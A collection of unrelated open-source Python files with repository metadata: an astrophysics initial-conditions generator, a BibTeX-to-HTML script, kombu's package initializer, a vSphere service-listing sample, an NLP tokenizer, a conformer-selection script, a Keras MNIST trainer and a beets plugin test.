"""
Created on Wed Mar 12 12:48:33 2014
@author: ibackus
"""
# External modules
import pynbody
SimArray = pynbody.array.SimArray
import numpy as np
import os
import cPickle as pickle
# ICgen modules
import calc_rho_zr
import calc_temp
import pos_class
import make_snapshot
import ICgen_settings
import make_sigma
import isaac
# Initial stuff
ICgenDir = os.path.dirname(os.path.realpath(__file__))
class IC:
"""
Defines the IC class.
GENERATING NEW INITIAL CONDITIONS
# Generate an IC object from 1-D SimArrays r, sigma (surface density)
IC = ICgen.IC(r, sigma)
"""
def __init__(self, r, sigma):
# Initialize
# Load up default settings
self.settings = ICgen_settings.settings()
# Add modules/attributes
self.T = calc_temp.T(self)
self.maker = maker(self)
self.add = add(self)
# Generate sigma spline interpolation
self.maker.sigma_gen(r, sigma)
# Define a saving function
def saver(filename = None):
"""
A wrapper for ICgen.save
"""
save(self, filename)
self.save = saver
def generate(self, restart=False):
"""
Runs through all the steps to generate a set of initial conditions
IF restart=True, it picks up at the last completed step
"""
if restart:
# Find the last completed step
if hasattr(self, 'pos'): initial_step = 3
elif hasattr(self, 'rho'): initial_step = 2
else: initial_step = 1
else:
initial_step = 1
self.save()
if initial_step <= 1:
# Generate rho
self.maker.rho_gen()
self.save()
if initial_step <= 2:
# Generate positions
self.maker.pos_gen()
self.save()
if initial_step <= 3:
# Generate snapshot
self.maker.snapshot_gen()
self.save()
def save(ICobj, filename=None):
if filename is None:
filename = ICobj.settings.filenames.IC_file_name
save_dict = {}
# --------------------------------------------------
# GET SETTINGS
# --------------------------------------------------
save_dict['settings'] = ICobj.settings
# --------------------------------------------------
# Prepare rho, if available
# --------------------------------------------------
if hasattr(ICobj, 'rho'):
rho = ICobj.rho
# Generate a dictionary containing rho_binned, z_bins, r_bins
rho_dict = {\
'rho': rho.rho_binned,\
'z': rho.z_bins,\
'r': rho.r_bins}
# Update save dictionary
save_dict['rho'] = rho_dict
# --------------------------------------------------
# Prepare sigma, if available
# --------------------------------------------------
if hasattr(ICobj, 'sigma'):
sigma = ICobj.sigma
# Update save dictionary
save_dict['sigma'] = sigma.input_dict
# --------------------------------------------------
# Prepare pos if possible
# --------------------------------------------------
if hasattr(ICobj, 'pos'):
save_dict['pos'] = ICobj.pos
# --------------------------------------------------
# Prepare param if possible
# --------------------------------------------------
if hasattr(ICobj, 'snapshot_param'):
save_dict['snapshot_param'] = ICobj.snapshot_param
param_name = ICobj.settings.filenames.paramName
isaac.configsave(ICobj.snapshot_param, param_name)
print 'param file saved to {}'.format(param_name)
# --------------------------------------------------
# SAVE
# --------------------------------------------------
# Save snapshot if possible
if hasattr(ICobj, 'snapshot'):
fmt = pynbody.tipsy.TipsySnap
fname = ICobj.settings.filenames.snapshotName
save_dict['snapshotName'] = fname
ICobj.snapshot.write(fmt = fmt, filename = fname)
# Save the save dictionary
pickle.dump(save_dict,open(filename,'wb'))
print 'Initial conditions saved to {}'.format(filename)
def load(filename):
# Load everything available from filename
input_dict = pickle.load(open(filename,'rb'))
sigma = input_dict['sigma']['sigma']
r = input_dict['sigma']['r']
ICobj = IC(r, sigma)
# Parse the input dictionary
if 'settings' in input_dict:
print 'loading settings'
ICobj.settings = input_dict['settings']
if 'rho' in input_dict:
print 'loading rho'
ICobj.add.rho(input_dict['rho'])
if 'pos' in input_dict:
print 'loading pos'
ICobj.pos = input_dict['pos']
if 'snapshotName' in input_dict:
print 'loading snapshot'
fname = input_dict['snapshotName']
ICobj.snapshot = pynbody.load(fname)
if 'snapshot_param' in input_dict:
print 'loading param'
ICobj.snapshot_param = input_dict['snapshot_param']
return ICobj
class add:
"""
Contains modules to load data/parameters
"""
def __init__(self, ICobj):
self._parent = ICobj
def rho(self,rho_dict):
"""
Generates a rho object and stores it in ICobj.rho
rho_dict should be a dictionary containing:
'z': 1D array of z values
'r': 1D array of r values
'rho': 2D array of rho evaluated at z,r
Example:
rho_dict = pickle.load(open('rhofile.p', 'rb')) # Load up a rho dict
ICobj.add.rho(rho_dict) # create ICobj.rho
"""
# Create rho object (includes a spline interpolation)
rho_binned = rho_dict['rho']
z_bins = rho_dict['z']
r_bins = rho_dict['r']
self._parent.rho = calc_rho_zr.rho_from_array(self._parent, rho_binned, z_bins, r_bins)
print 'rho stored in <IC instance>.rho'
class maker:
"""
A Wrapper containing various functions for generating initial conditions.
Outputs of the functions are saved to the IC object. The IC object is
referenced as self._parent. So to access temperature, simply call
self._parent.T(r)
"""
def __init__(self, ICobj):
self._parent = ICobj
def sigma_gen(self, r, sigma):
"""
A Wrapper for make_sigma.sigma_gen
See make_sigma.sigma_gen for documentation
Upon executing, generates sigma, pdf, and cdf_inv and saves to ICobj
USAGE:
ICobj.maker.sigma_gen(r, sigma)
r and sigma should be 1-D SimArrays. sigma is the surface density
evaluated at r
"""
# Generate sigma
sigma = make_sigma.sigma_gen(r, sigma)
# Copy sigma to the parent (IC) object
self._parent.sigma = sigma
print 'Sigma stored in <IC instance>.sigma'
def rho_gen(self):
"""
A wrapper for calc_rho_zr.
Upon executing, generates rho and rho cdf inverse
"""
# Check that sigma has been generated
if not hasattr(self._parent, 'sigma'):
raise RuntimeError('Must load/generate sigma before calculating rho')
# Numerically calculate rho(z,r) for a given sigma. rho(z,r)
# obeys vertical hydrostatic equilibrium (approximately)
rho_array, z, r = calc_rho_zr.rho_zr(self._parent)
# Create a complete rho object. Includes rho spline and CDF inverse
rho = calc_rho_zr.rho_from_array(self._parent, rho_array, z, r)
# Save to ICobj
self._parent.rho = rho
print 'rho stored in <IC instance>.rho'
def pos_gen(self, method = None):
"""
A wrapper for generating positions according to rho and sigma
Initializes a pos object (see pos_class.py) and saves it to ICobj.pos
IF called with method not set, the method used is:
ICobj.settings.pos_gen.method
"""
# Generate positions object
pos = pos_class.pos(self._parent, method)
# Save it to ICobj
self._parent.pos = pos
def snapshot_gen(self):
"""
A wrapper for generating a tipsy snapshot from the initial conditions
Uses make_snapshot.py
"""
# Generate snapshot
snapshot, snapshot_param = make_snapshot.snapshot_gen(self._parent)
# Save to ICobj
self._parent.snapshot = snapshot
self._parent.snapshot_param = snapshot_param
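# ---------------------------------------------------------------------------
# Example usage (illustrative sketch, not part of the original module). The
# radial grid, the power-law profile, the units ('au', 'Msol au**-2') and the
# file name 'IC.p' are made-up placeholders; IC(), generate(), save() and
# load() are the functions defined above.
# ---------------------------------------------------------------------------
def _example_usage():
    # 1-D radial grid and a simple power-law surface density profile
    r_vals = np.linspace(0.1, 30.0, 500)
    r = SimArray(r_vals, 'au')
    sigma = SimArray(100.0 * (r_vals / r_vals[0]) ** -1.5, 'Msol au**-2')

    # Build the IC object and run every generation step (rho, positions, snapshot)
    ic = IC(r, sigma)
    ic.settings.filenames.IC_file_name = 'IC.p'
    ic.generate()

    # The object is pickled after every step, so an interrupted run can resume
    ic = load('IC.p')
    ic.generate(restart=True)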
|
{
"content_hash": "472a4e51be14c192bf2c5e499ec63267",
"timestamp": "",
"source": "github",
"line_count": 316,
"max_line_length": 95,
"avg_line_length": 28.949367088607595,
"alnum_prop": 0.5099475295146481,
"repo_name": "dflemin3/ICgen",
"id": "8ddfb9f0df5ef582ca18d4d06d05a6b82e040ef1",
"size": "9172",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "backup02/ICgen.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "516765"
}
],
"symlink_target": ""
}
|
import bibtexparser
#from bibtexparser.bparser import BibTexParser
from bibtexparser.customization import *
import codecs
#import sys
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
HTML = 1
LATEX = 2
def customizations(record):
"""Use some functions delivered by the library
:param record: a record
:returns: -- customized record
"""
record = type(record)
record = author(record)
record = editor(record)
record = journal(record)
record = keyword(record)
record = link(record)
record = page_double_hyphen(record)
record = doi(record)
return record
def build_topics_to_titles_with_id(bib_database):
id_to_entry = {}
topics_to_titles_with_id = {}
for entry in bib_database.entries:
if entry.has_key('id'): # probably unnecessary, but for now
id_to_entry[entry['id']] = entry
if entry.has_key('keyword'):
keywords = [keyword.strip().lower() for keyword in entry['keyword'].split(',')]
for keyword in set(keywords):
if not topics_to_titles_with_id.has_key(keyword):
topics_to_titles_with_id[keyword] = []
if entry.has_key('title') and entry.has_key('id'):
topics_to_titles_with_id[keyword].append((entry['id'], entry['title']))
return (topics_to_titles_with_id, id_to_entry)
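# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original script): parse a BibTeX file
# and report how many titles were collected per topic. The file name
# 'example.bib' is a made-up placeholder; bibtexparser.loads() and
# build_topics_to_titles_with_id() are used exactly as in main() below.
# ---------------------------------------------------------------------------
def _example_topic_counts(bibtexfilepath='example.bib'):
    with open(bibtexfilepath) as bibtex_file:
        bib_database = bibtexparser.loads(bibtex_file.read())
    topics_to_titles_with_id, id_to_entry = build_topics_to_titles_with_id(bib_database)
    for topic in sorted(topics_to_titles_with_id):
        print topic, len(topics_to_titles_with_id[topic])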
def create_hyperlinks_to_topics(topics_to_titles_with_id, ignore_topics, out_fh, output_type):
#global topic, topic_line_len, spaceless_topic
topic_line_len = 0
for topic in sorted(topics_to_titles_with_id):
topic = topic.lower().strip()
if not topic.lower().strip() in ignore_topics:
topic_line_len += len(topic) + 3
#if topic_line_len > 100:
# out_fh.write(u"<br>\n")
# topic_line_len = 0
spaceless_topic = topic.replace(u' ', u'_')
out_fh.write(u'''<a href="#%s">[%s]</a> ''' % (spaceless_topic, topic))
# print topic, len(topics_to_titles_with_id[topic]), topics_to_titles_with_id[topic][:2]
def create_list_of_titles_per_topic(topics_to_titles_with_id, ignore_topics, out_fh, output_type):
for topic in sorted(topics_to_titles_with_id):
topic = topic.lower().strip()
if not topic in ignore_topics:
spaceless_topic = topic.replace(' ', '_')
out_fh.write(u'''<h2><a name="%s"></a>%s</h2>''' % (spaceless_topic, topic.title()))
out_fh.write(u"\n")
out_fh.write(u"<ol>")
out_fh.write(u"\n")
for (pubid, title) in topics_to_titles_with_id[topic]:
out_fh.write(u"<li><a href=\"#%s\">%s</a>" % (pubid, title))
out_fh.write(u"\n")
out_fh.write(u"</ol>")
out_fh.write(u"\n")
out_fh.write("<br>")
def create_bibtex_bibliography(id_to_entry, out_fh, output_type):
for pubid in sorted(id_to_entry):
entry = id_to_entry[pubid]
#print entry
#print dir(entry)
#print help(entry)
#out_fh.write(entry)
#print entry
field_order = ["title","author","journal","booktitle","volume","number","pages",
"month","year","organization","publisher","school","keywords"]
searchable_fields = ["title","author","journal","booktitle","organization","school"]
bibtex_types = {"article":"@article",
"inproceedings":"@inproceedings",
"incollection":"@incollection",
"phdthesis":"@phdthesis",
"misc":"@misc",
"techreport":"@techreport"}
out_fh.write(u"\n")
out_fh.write(bibtex_types[entry["type"]])
out_fh.write("{<a name=\"%s\"></a>%s" % (pubid,pubid))
for field in field_order:
if not field in ["type", "id"] and entry.has_key(field):
out_fh.write(",\n")
if len(entry[field].strip()) > 0:
if field in searchable_fields:
search_query = entry[field].replace(u' ',u'+')
out_fh.write(u''' %s = {<a href="http://google.com/search?q=%s">%s</a>}''' % (field, search_query, entry[field]))
else:
out_fh.write(u''' %s = {%s}''' % (field, entry[field]))
out_fh.write("\n}\n")
#sys.exit(0)
#for field in field_order: if entry.has_key(field)
out_fh.write(u"\n")
def main(bibtexfilepath, out_fh, output_type):
with open(bibtexfilepath) as bibtex_file:
bibtex_str = bibtex_file.read()
bib_database = bibtexparser.loads(bibtex_str)
#print(bib_database.entries)
(topics_to_titles_with_id, id_to_entry) = build_topics_to_titles_with_id(bib_database)
ignore_topics = ['', 'misc']
out_fh.write(codecs.open('header.html',encoding="utf-8").read())
# a) create hyperlinks to topics
create_hyperlinks_to_topics(topics_to_titles_with_id, ignore_topics, out_fh, output_type=HTML)
# b) create list of titles per topic
create_list_of_titles_per_topic(topics_to_titles_with_id, ignore_topics, out_fh, output_type=HTML)
# c) create bibtex list at the end, that get pointed to by 2
#for pubid in sorted(id_to_entry):
# print '''<a name="%s"></a>''' % (pubid)
#parser = BibTexParser()
#parser.customization = customizations
#bib_database = bibtexparser.loads(bibtex_str, parser=parser)
#print(bib_database.entries)
out_fh.write("<h1>BIBLIOGRAPHY</h1>")
out_fh.write("<pre>\n")
create_bibtex_bibliography(id_to_entry,out_fh=out_fh,output_type=HTML)
out_fh.write("</pre>\n")
out_fh.write("</ul>")
if __name__ == "__main__":
out_fh = codecs.open("deeplearningbibliography20150415.html", "wb", encoding="utf-8")
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
#main(bibtexfilepath = '../bibtex/deeplearninggpuwithkeywords2014.bib', out_fh=out_fh, output_type=HTML)
main(bibtexfilepath = '../miscdata/rawdata.bib', out_fh=out_fh, output_type=HTML)
out_fh.close()
|
{
"content_hash": "63c71135985f036a7a127be4606a4544",
"timestamp": "",
"source": "github",
"line_count": 166,
"max_line_length": 138,
"avg_line_length": 38.5,
"alnum_prop": 0.5776873728680958,
"repo_name": "memkite/DeepLearningBibliography",
"id": "2ee7c8674e93659f71bd3a761a152748d70f6e5f",
"size": "6414",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/process_bibliography.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "4104664"
},
{
"name": "Python",
"bytes": "66179"
},
{
"name": "Shell",
"bytes": "225"
},
{
"name": "TeX",
"bytes": "2296969"
}
],
"symlink_target": ""
}
|
"""Messaging library for Python"""
from __future__ import absolute_import
from collections import namedtuple
version_info_t = namedtuple(
'version_info_t', ('major', 'minor', 'micro', 'releaselevel', 'serial'),
)
VERSION = version_info_t(3, 0, 7, '', '')
__version__ = '{0.major}.{0.minor}.{0.micro}{0.releaselevel}'.format(VERSION)
__author__ = 'Ask Solem'
__contact__ = 'ask@celeryproject.org'
__homepage__ = 'http://kombu.readthedocs.org'
__docformat__ = 'restructuredtext en'
# -eof meta-
import os
import sys
if sys.version_info < (2, 6): # pragma: no cover
raise Exception('Kombu 3.1 requires Python versions 2.6 or later.')
STATICA_HACK = True
globals()['kcah_acitats'[::-1].upper()] = False
if STATICA_HACK: # pragma: no cover
# This is never executed, but tricks static analyzers (PyDev, PyCharm,
# pylint, etc.) into knowing the types of these symbols, and what
# they contain.
from kombu.connection import Connection, BrokerConnection # noqa
from kombu.entity import Exchange, Queue, binding # noqa
from kombu.messaging import Consumer, Producer # noqa
from kombu.pools import connections, producers # noqa
from kombu.utils.url import parse_url # noqa
from kombu.common import eventloop, uuid # noqa
from kombu.serialization import ( # noqa
enable_insecure_serializers,
disable_insecure_serializers,
)
# Lazy loading.
# - See werkzeug/__init__.py for the rationale behind this.
from types import ModuleType
all_by_module = {
'kombu.connection': ['Connection', 'BrokerConnection'],
'kombu.entity': ['Exchange', 'Queue', 'binding'],
'kombu.messaging': ['Consumer', 'Producer'],
'kombu.pools': ['connections', 'producers'],
'kombu.utils.url': ['parse_url'],
'kombu.common': ['eventloop', 'uuid'],
'kombu.serialization': ['enable_insecure_serializers',
'disable_insecure_serializers'],
}
object_origins = {}
for module, items in all_by_module.items():
for item in items:
object_origins[item] = module
class module(ModuleType):
def __getattr__(self, name):
if name in object_origins:
module = __import__(object_origins[name], None, None, [name])
for extra_name in all_by_module[module.__name__]:
setattr(self, extra_name, getattr(module, extra_name))
return getattr(module, name)
return ModuleType.__getattribute__(self, name)
def __dir__(self):
result = list(new_module.__all__)
result.extend(('__file__', '__path__', '__doc__', '__all__',
'__docformat__', '__name__', '__path__', 'VERSION',
'__package__', '__version__', '__author__',
'__contact__', '__homepage__', '__docformat__'))
return result
# 2.5 does not define __package__
try:
package = __package__
except NameError: # pragma: no cover
package = 'kombu'
# keep a reference to this module so that it's not garbage collected
old_module = sys.modules[__name__]
new_module = sys.modules[__name__] = module(__name__)
new_module.__dict__.update({
'__file__': __file__,
'__path__': __path__,
'__doc__': __doc__,
'__all__': tuple(object_origins),
'__version__': __version__,
'__author__': __author__,
'__contact__': __contact__,
'__homepage__': __homepage__,
'__docformat__': __docformat__,
'__package__': package,
'VERSION': VERSION})
if os.environ.get('KOMBU_LOG_DEBUG'): # pragma: no cover
os.environ.update(KOMBU_LOG_CHANNEL='1', KOMBU_LOG_CONNECTION='1')
from .utils import debug
debug.setup_logging()
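# ---------------------------------------------------------------------------
# Illustrative sketch (not part of kombu itself): what the lazy-loading module
# class above means for user code. The broker URL is a made-up example.
#
#     >>> import kombu
#     >>> conn = kombu.Connection('amqp://guest:guest@localhost//')
#
# The first attribute access ("kombu.Connection") goes through
# module.__getattr__, which imports kombu.connection, caches every name that
# submodule contributes to the top-level namespace via setattr(), and returns
# the requested attribute. Subsequent accesses hit the cached attribute
# directly, so only the submodules actually used are ever imported.
# ---------------------------------------------------------------------------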
|
{
"content_hash": "71bdbc3d150bbceb1699940d0006cbdd",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 77,
"avg_line_length": 35.47663551401869,
"alnum_prop": 0.5879873551106428,
"repo_name": "andresriancho/kombu",
"id": "37c9cc1c7df9ca575960343f44fb430caaf3b8d4",
"size": "3796",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "kombu/__init__.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "714416"
},
{
"name": "Shell",
"bytes": "2059"
}
],
"symlink_target": ""
}
|
"""
* *******************************************************
* Copyright (c) VMware, Inc. 2016, 2018. All Rights Reserved.
* SPDX-License-Identifier: MIT
* *******************************************************
*
* DISCLAIMER. THIS PROGRAM IS PROVIDED TO YOU "AS IS" WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, WHETHER ORAL OR WRITTEN,
* EXPRESS OR IMPLIED. THE AUTHOR SPECIFICALLY DISCLAIMS ANY IMPLIED
* WARRANTIES OR CONDITIONS OF MERCHANTABILITY, SATISFACTORY QUALITY,
* NON-INFRINGEMENT AND FITNESS FOR A PARTICULAR PURPOSE.
"""
__author__ = 'VMware, Inc.'
__copyright__ = 'Copyright 2018 VMware, Inc. All rights reserved.'
__vcenter_version__ = '6.7+'
from vmware.vapi.vsphere.client import create_vsphere_client
from samples.vsphere.common.ssl_helper import get_unverified_session
from samples.vsphere.common import sample_cli
from samples.vsphere.common import sample_util
class ListServices(object):
"""
Demonstrates the details of vCenter Services
Retrieves the vCenter Services, its Health Status and Service Startup Type.
Prerequisites:
- vCenter Server
"""
def __init__(self):
# Create argument parser for standard inputs:
# server, username, password and skipverification
parser = sample_cli.build_arg_parser()
args = sample_util.process_cli_args(parser.parse_args())
# Skip server cert verification if needed.
# This is not recommended in production code.
session = get_unverified_session() if args.skipverification else None
# Connect to vSphere client
self.client = create_vsphere_client(
server=args.server,
username=args.username,
password=args.password,
session=session)
def run(self):
services_list = self.client.vcenter.services.Service.list_details()
for key, value in services_list.items():
print(
'Service Name: {}, Service Name Key: {}, Service Health: {}, Service Status: {}, Service Startup Type: {}'
.format(key, value.name_key, value.health, value.state,
value.startup_type))
def main():
list_services = ListServices()
list_services.run()
if __name__ == '__main__':
main()
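# ---------------------------------------------------------------------------
# Illustrative invocation (sketch, not part of the sample). The argument names
# match the attributes read from the standard sample_cli parser above
# (server, username, password, skipverification); the exact flag spellings and
# the server address and credentials below are assumptions.
#
#     $ python services_list.py --server vc.example.com \
#           --username administrator@vsphere.local --password '***' \
#           --skipverification
# ---------------------------------------------------------------------------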
|
{
"content_hash": "a56cd3417f7704341cb795afeb0d099b",
"timestamp": "",
"source": "github",
"line_count": 67,
"max_line_length": 122,
"avg_line_length": 33.88059701492537,
"alnum_prop": 0.6352422907488987,
"repo_name": "tianhao64/vsphere-automation-sdk-python",
"id": "3752c8b4f90c0ca562a1401d755dc161ae23f39e",
"size": "2292",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "samples/vsphere/services/services_list.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "HTML",
"bytes": "1596"
},
{
"name": "Python",
"bytes": "11861"
}
],
"symlink_target": ""
}
|
"""Functions for document tokenization."""
import string
import regex as re
# This is designed to match:
# - unicode separators (spaces, paragraph separators, etc.)
# - unicode symbols (math symbols, currency symbols, etc.)
# - other symbols (control characters, formatting indicators, etc.)
# These typically will get in the way of algorithms operating at
# the word level, so we want to substitute them out.
SEPARATOR_SYMBOL_FILTER = re.compile(
r'[\p{Separator}\p{Symbol}\p{Other}]+',
flags=re.MULTILINE
)
# This is designed to match a sequence of four symbols that are either:
# - unicode punctuation
# - unicode separators (spaces, paragraph separators, etc.)
# We want to keep some punctuation so we can parse phrases, sentences, acronyms
# and names with dots in them, but input text often has needless or excessive
# punctuation as leftover entrails from whatever system we pulled the text
# out of.
EXCESSIVE_PUNCTUATION = re.compile(
r'[\p{Punctuation}\p{Separator}]{4,}',
flags=re.MULTILINE
)
SPECIAL_CHARACTERS = re.compile(
r'[\p{Punctuation}\p{Separator}\p{Symbol}\p{Other}]+',
flags=re.MULTILINE
)
# These are OntoNotes 5 / Penn TreeBank tags for Spacy tokens that
# we probably don't want to include.
FILTERED_TOKENS = (
'XX', # unknown tokens
'ADD', # email addresses
'CD', # cardinal number
'SP', # space(s)
'$', # currency
'SYM' # symbols
)
PUNCTUATION = set(string.punctuation)
def clean_unicode_punctuation(input_str):
"""
Clean up Unicode punctuation in an input string.
Replace unicode separators and symbols with ASCII spaces.
Replace (punctuation, separator) sequences of >=4 with
an ASCII period and a space.
"""
partial = SEPARATOR_SYMBOL_FILTER.sub(' ', input_str)
return EXCESSIVE_PUNCTUATION.sub('. ', partial)
def str_is_all_punctuation(input_str):
"""
Return True if input_str is made up of ASCII punctuation.
This is necessary because Spacy doesn't always figure out
whether a token is punctuation, and this is easier than figuring
out how to fix Spacy's tokenizer.
"""
return len(set(input_str).difference(PUNCTUATION)) == 0
def is_bad_token(token):
"""Filter tokens that aren't good for machine learning.
Returns True if the token is bad.
The `token` argument needs to be a Spacy Token object.
"""
return (
token.tag_ in FILTERED_TOKENS or
token.is_punct or
token.is_stop or
token.like_num or
token.like_url or
# get rid of errant email addresses
'@' in token.text or
# this is going to clobber some useful words
# like "car", but it also gets rid of a lot of crap.
len(token) < 4 or
str_is_all_punctuation(token.text)
)
def tokenize_with_spacy(doc):
"""Turn a single document into a generator of tokens.
The `doc` argument needs to be a Spacy Document.
"""
for ent in doc.ents:
if len(ent) > 1:
ent.merge(ent.root.tag_, ent.text, ent.root.ent_type_)
for token in doc:
if is_bad_token(token):
continue
text = ' '.join(token.lemma_.strip().split()).replace(' ', '_')
if text:
yield text
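# ---------------------------------------------------------------------------
# Illustrative sketch (not part of the original module): run the helpers above
# on a raw string. Assumes spaCy 2.x (Span.merge(), used in
# tokenize_with_spacy, was removed in spaCy 3) and that the 'en_core_web_sm'
# model is installed; both are assumptions, not requirements stated here.
# ---------------------------------------------------------------------------
def _example_pipeline(text):
    import spacy
    nlp = spacy.load('en_core_web_sm')
    doc = nlp(clean_unicode_punctuation(text))
    return list(tokenize_with_spacy(doc))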
|
{
"content_hash": "2aa6bdaf0108d7852f3909c5995c06a5",
"timestamp": "",
"source": "github",
"line_count": 106,
"max_line_length": 79,
"avg_line_length": 30.69811320754717,
"alnum_prop": 0.6644130301167793,
"repo_name": "jamesmishra/nlp-playground",
"id": "2a1873ae342c30d52b75f1d1e7bddddc0d7717cd",
"size": "3254",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "nlp_playground/lib/tokenize.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "76418"
},
{
"name": "Shell",
"bytes": "2459"
}
],
"symlink_target": ""
}
|
import sys
if len(sys.argv) < 2:
print "mostocc.py column_in_fort.38"
sys.exit(0)
# get occupancy from fort.38 column 8
OccTable = {}
fort38 = open("fort.38").readlines()
column = int(sys.argv[1])
for line in fort38:
# get confID
fields = line.split()
if len(fields[0]) == 14:
confID = fields[0]
occ = float(fields[column])
OccTable[confID] = occ
# group into residues
OccInRes = {}
for conf in OccTable.keys():
resID = conf[:3]+conf[5:11]
if OccInRes.has_key(resID):
OccInRes[resID].append((conf, OccTable[conf]))
else:
OccInRes[resID] = [(conf, OccTable[conf])]
# get max conf
maxConfs = []
for res in OccInRes.keys():
confs = OccInRes[res]
maxocc = confs[0]
for conf in confs:
if conf[1] > maxocc[1]:
maxocc = conf
maxConfs.append(maxocc[0])
#for x in maxConfs: print x
# read in a file and keep only the most occupied confs
pdb = open("step3_out.pdb").readlines()
outpdb = []
for line in pdb:
if len(line) <82: continue
if line[26] == ' ': iCode = '_'
else: iCode = line[26]
confID = line[17:20]+line[80:82]+line[21:26]+iCode+line[27:30]
if confID in maxConfs or confID[3:5] == 'BK':
outpdb.append(line)
sys.stdout.writelines(outpdb)
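# ---------------------------------------------------------------------------
# Illustrative invocation (sketch, not part of the original script). The
# script reads fort.38 and step3_out.pdb from the working directory, keeps
# only the most occupied conformer per residue, and writes the result to
# stdout. The column index and output file name below are example values.
#
#     $ python mostocc.py 8 > step3_mostocc.pdb
# ---------------------------------------------------------------------------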
|
{
"content_hash": "6b67061affe7833a5bfc1cd11c37e2b9",
"timestamp": "",
"source": "github",
"line_count": 53,
"max_line_length": 65,
"avg_line_length": 23.62264150943396,
"alnum_prop": 0.6269968051118211,
"repo_name": "MarilyGunnersLab/MCCE",
"id": "3b60496e00c29bdc863b6013c12dfce61f01543c",
"size": "1271",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mcce_stable/bin/mostocc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "2280903"
},
{
"name": "FORTRAN",
"bytes": "626441"
},
{
"name": "Groff",
"bytes": "1676"
},
{
"name": "Makefile",
"bytes": "8378"
},
{
"name": "Perl",
"bytes": "515"
},
{
"name": "Python",
"bytes": "72552"
},
{
"name": "Shell",
"bytes": "47"
},
{
"name": "Smarty",
"bytes": "2229816"
}
],
"symlink_target": ""
}
|
'''Trains a simple convnet on the MNIST dataset.
Gets to 99.25% test accuracy after 12 epochs
(there is still a lot of margin for parameter tuning).
16 seconds per epoch on a GRID K520 GPU.
'''
from __future__ import print_function
import keras
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Dropout, Flatten
from keras.layers import Conv2D, MaxPooling2D
from keras import backend as K
from keras.models import load_model
batch_size = 128
num_classes = 10
epochs = 12
# input image dimensions
img_rows, img_cols = 28, 28
# the data, shuffled and split between train and test sets
(x_train, y_train), (x_test, y_test) = mnist.load_data()
if K.image_data_format() == 'channels_first':
x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)
x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)
input_shape = (1, img_rows, img_cols)
else:
x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)
x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)
input_shape = (img_rows, img_cols, 1)
x_train = x_train.astype('float32')
x_test = x_test.astype('float32')
x_train /= 255
x_test /= 255
print('x_train shape:', x_train.shape)
print(x_train.shape[0], 'train samples')
print(x_test.shape[0], 'test samples')
# convert class vectors to binary class matrices
y_train = keras.utils.to_categorical(y_train, num_classes)
y_test = keras.utils.to_categorical(y_test, num_classes)
model = Sequential()
model.add(Conv2D(32, kernel_size=(3, 3),
activation='relu',
input_shape=input_shape))
model.add(Conv2D(64, (3, 3), activation='relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.25))
model.add(Flatten())
model.add(Dense(128, activation='relu'))
model.add(Dropout(0.5))
model.add(Dense(num_classes, activation='softmax'))
model.compile(loss=keras.losses.categorical_crossentropy,
optimizer=keras.optimizers.Adadelta(),
metrics=['accuracy'])
model.fit(x_train, y_train,
batch_size=batch_size,
epochs=epochs,
verbose=1,
validation_data=(x_test, y_test))
score = model.evaluate(x_test, y_test, verbose=0)
print('Test loss:', score[0])
print('Test accuracy:', score[1])
# Save the trained model to an HDF5 file
model.save('mnist_cnn_model.h5')
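# Illustrative follow-up (sketch, not part of the original script): reload the
# saved model and classify one test image. load_model is already imported
# above; x_test comes from the preprocessing earlier in this script.
def _example_reload_and_predict():
    model = load_model('mnist_cnn_model.h5')
    probabilities = model.predict(x_test[:1])
    print('Predicted digit:', probabilities.argmax(axis=-1)[0])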
|
{
"content_hash": "5e99e89a03f1b2196cdf2bac00e8511f",
"timestamp": "",
"source": "github",
"line_count": 75,
"max_line_length": 70,
"avg_line_length": 31.4,
"alnum_prop": 0.6874734607218683,
"repo_name": "yoshiweb/keras-mnist",
"id": "0689c072547f81306cca07dad461df4f0850c7f6",
"size": "2369",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "keras-mnist/mnist_cnn/mnist_cnn_train.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "5800"
}
],
"symlink_target": ""
}
|
"""Tests for the 'ihate' plugin"""
from _common import unittest
from beets import importer
from beets.library import Item
from beetsplug.ihate import IHatePlugin
class IHatePluginTest(unittest.TestCase):
def test_hate(self):
match_pattern = {}
test_item = Item(
genre='TestGenre',
album=u'TestAlbum',
artist=u'TestArtist')
task = importer.SingletonImportTask(test_item)
# Empty query should let it pass.
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
# 1 query match.
match_pattern = ["artist:bad_artist","artist:TestArtist"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
# 2 query matches, either should trigger.
match_pattern = ["album:test","artist:testartist"]
self.assertTrue(IHatePlugin.do_i_hate_this(task, match_pattern))
# Query is blocked by AND clause.
match_pattern = ["album:notthis genre:testgenre"]
self.assertFalse(IHatePlugin.do_i_hate_this(task, match_pattern))
